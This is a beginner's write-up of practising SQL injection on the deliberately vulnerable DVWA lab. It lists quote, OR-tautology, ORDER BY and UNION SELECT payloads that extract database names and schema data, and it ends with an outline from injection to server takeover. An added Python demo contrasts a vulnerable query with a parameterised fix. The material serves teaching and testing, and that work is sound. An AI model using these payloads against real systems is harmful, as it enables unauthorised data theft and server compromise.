First sign in to the DVWA home page:
1. Set the security level to Low on the DVWA Security page (start with the easy level).
2. Open the SQL Injection page, and it errors out. (At that point I thought the official DVWA simply couldn't be played with.)
The page shows the error: Parse error: syntax error, unexpected '[' in C:\xampp\htdocs\DVWA\vulnerabilities\sqli\index.php on line
Hurriedly open index.php and look at the PHP code at line 65, which the error points to! (Not that I want to; I am learning Java.)
$num = mysqli_fetch_row($result)[0]; // mysqli_fetch_row() does return an array; indexing a function call directly (f()[0]) only works on PHP 5.4 and newer, and older PHP reports exactly this parse error
----> My guess was that the return type is not an array, so I removed the [0], tested it, and it was fine =. = (I'll leave the specifics to the PHP people; just get it running first.)
3. With that fixed, the first attempt at SQL injection begins, and it is a wonderful experience.
Following the page's prompt, enter a user ID and it returns that user's information. Start by entering "1".
When the data comes back successfully, the URL in the browser address bar is:
http://192.168.204.132/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#
Changing the input to 2 turns it into:
http://192.168.204.132/DVWA/vulnerabilities/sqli/?id=2&submit=submit#
Enter a single quote ' and the page errors:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use " at line 1
Because the value the user enters is an ID, we habitually assume the injection point is numeric, so try entering 1 or 1=1 and see whether the query still works:
The address bar becomes http://192.168.204.132/DVWA/vulnerabilities/sqli/?id=1+or+1%3D1&Submit=Submit# but only the single row for user 1 comes back, not every user.
So the guess is that the back end treats this value as a string. Enter 1' or '1'='1 instead, and the query successfully returns multiple rows of data (very exciting, I must say).
According to the OWASP Testing Guide (http://www.owasp.org.cn/owasp-project/download/OWASP_testing_guide), the techniques include
union-query SQL injection, blind SQL injection, character-by-character extraction with SUBSTRING(text, start, length), and stored procedure injection.
Next, work out how many columns the query returns. There are two ways.
Method one: use an ORDER BY n clause.
We need the column count because the UNION SELECT used later to pull out sensitive data must return the same number of columns as the original query. ORDER BY n sorts on the n-th column of the result,
so if n is larger than the number of columns the query errors out, and that tells us the count.
ORDER BY 2 succeeds while ORDER BY 3 errors, so the number of columns is 2.
Method two: use UNION SELECT directly to guess the number of columns.
When the column counts do not match, that also produces an error.
1' union select #  ------- Error: The used SELECT statements have a different number of columns
1' union select 1,2#  ------- Normal, so the number of columns is 2
Use UNION together with the built-in functions user(), database() and version() to obtain the connected database account, the database name and the database version.
1' and 1=2 union select user(), database()#  ------ the database information comes back!!!
Use UNION together with MySQL's built-in information_schema database, which holds metadata about every database and table on the server.
1' and 1=2 union select 1, schema_name from information_schema.schemata#  --------- (scary!)
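The whole probing sequence above (quote test, numeric versus string probe, ORDER BY and UNION column counting, then UNION extraction), replayed against a small mock of the DVWA page. This is an added example, not code from the original post or from DVWA. It assumes the low-level page builds its query as SELECT first_name, last_name FROM users WHERE user_id = '<id>' (an assumption about the real DVWA source), fills a constructed users table, and uses SQLite so it runs offline. SQLite changes two details: the probes end in "-- " instead of MySQL's "#" comment, and sqlite_version() and sqlite_master stand in for MySQL's user(), database() and information_schema. The parameterised safe_lookup shows why the same probes do nothing once the value is bound instead of concatenated.

```python
import sqlite3

# Constructed sample rows shaped like DVWA's "users" table (assumption: only
# user_id, first_name and last_name are modelled; the real table has more columns).
SAMPLE_USERS = [
    (1, "admin", "admin"),
    (2, "Gordon", "Brown"),
    (3, "Hack", "Me"),
    (4, "Pablo", "Picasso"),
    (5, "Bob", "Smith"),
]

# MySQL has user(), database() and version(); SQLite only has sqlite_version().
SQLITE_VERSION = sqlite3.sqlite_version

# The page's probes end in "#" (a MySQL line comment). SQLite does not know "#",
# so the replayed probes use the portable "-- " comment instead.
PROBES = [
    "1",                                    # normal lookup
    "'",                                    # unbalanced quote -> syntax error
    "1 or 1=1",                             # numeric-style probe: no extra rows
    "1' or '1'='1",                         # string-style probe: every row
    "1' ORDER BY 2-- ",                     # column count, method one: ok
    "1' ORDER BY 3-- ",                     # one column too many -> error
    "1' UNION SELECT 1-- ",                 # column count, method two: error
    "1' UNION SELECT 1,2-- ",               # matching count -> one extra row
    "1' AND 1=2 UNION SELECT sqlite_version(), 'n/a'-- ",    # like user(), database()
    "1' AND 1=2 UNION SELECT 1, name FROM sqlite_master-- ",  # like information_schema
]


def make_db():
    """In-memory database holding the constructed sample table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER PRIMARY KEY, first_name TEXT, last_name TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_lookup(conn, user_id):
    """String-concatenated query modelled on DVWA's low-security sqli page (an
    assumption about its exact shape). Returns ("ok", rows) or ("error", message)."""
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    try:
        return "ok", conn.execute(query).fetchall()
    except sqlite3.Error as exc:
        return "error", str(exc)


def safe_lookup(conn, user_id):
    """The fix: bind the value as a parameter so it is data, never SQL syntax."""
    query = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return "ok", conn.execute(query, (user_id,)).fetchall()


def run_probes(conn, lookup):
    """Replay every probe through the given lookup function."""
    return {probe: lookup(conn, probe) for probe in PROBES}


def demo():
    """Returns (results against the vulnerable function, results against the fixed one)."""
    conn = make_db()
    return run_probes(conn, vulnerable_lookup), run_probes(conn, safe_lookup)


if __name__ == "__main__":
    vulnerable, fixed = demo()
    for probe in PROBES:
        print(f"{probe!r:60} vulnerable: {vulnerable[probe]}")
        print(f"{'':60} fixed:      {fixed[probe]}")
```

Running it shows the same pattern the page found by hand: the bare quote and ORDER BY 3 error out, 1 or 1=1 returns no extra rows while 1' or '1'='1 returns all five users, UNION SELECT 1 fails on the column count while UNION SELECT 1,2 succeeds, and the two extraction probes pull the engine version and the table list out of the result. Against safe_lookup every probe except "1" returns an empty result, because the bound value is compared as a whole and never parsed as SQL.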
To summarise today's first experience of SQL injection, the general approach is:
1. Find the injection point; a web scanner should be able to do this.
2. Through the injection point, try to obtain the database user name, the database name, the privileges of that database user, operating system information, the database version and other related information.
3. Guess the key database tables and their important columns and contents (typically the table and column names holding the administrator accounts).
4. Use the user information obtained to find the back-end login portal.
5. Use the back end to gather further information and escalate privileges, until you have control of the server.
Many thanks to the original poster, Yumbo, for sharing: http://blog.csdn.net/qq_20745827/article/details/68944753
SQL injection (DVWA environment)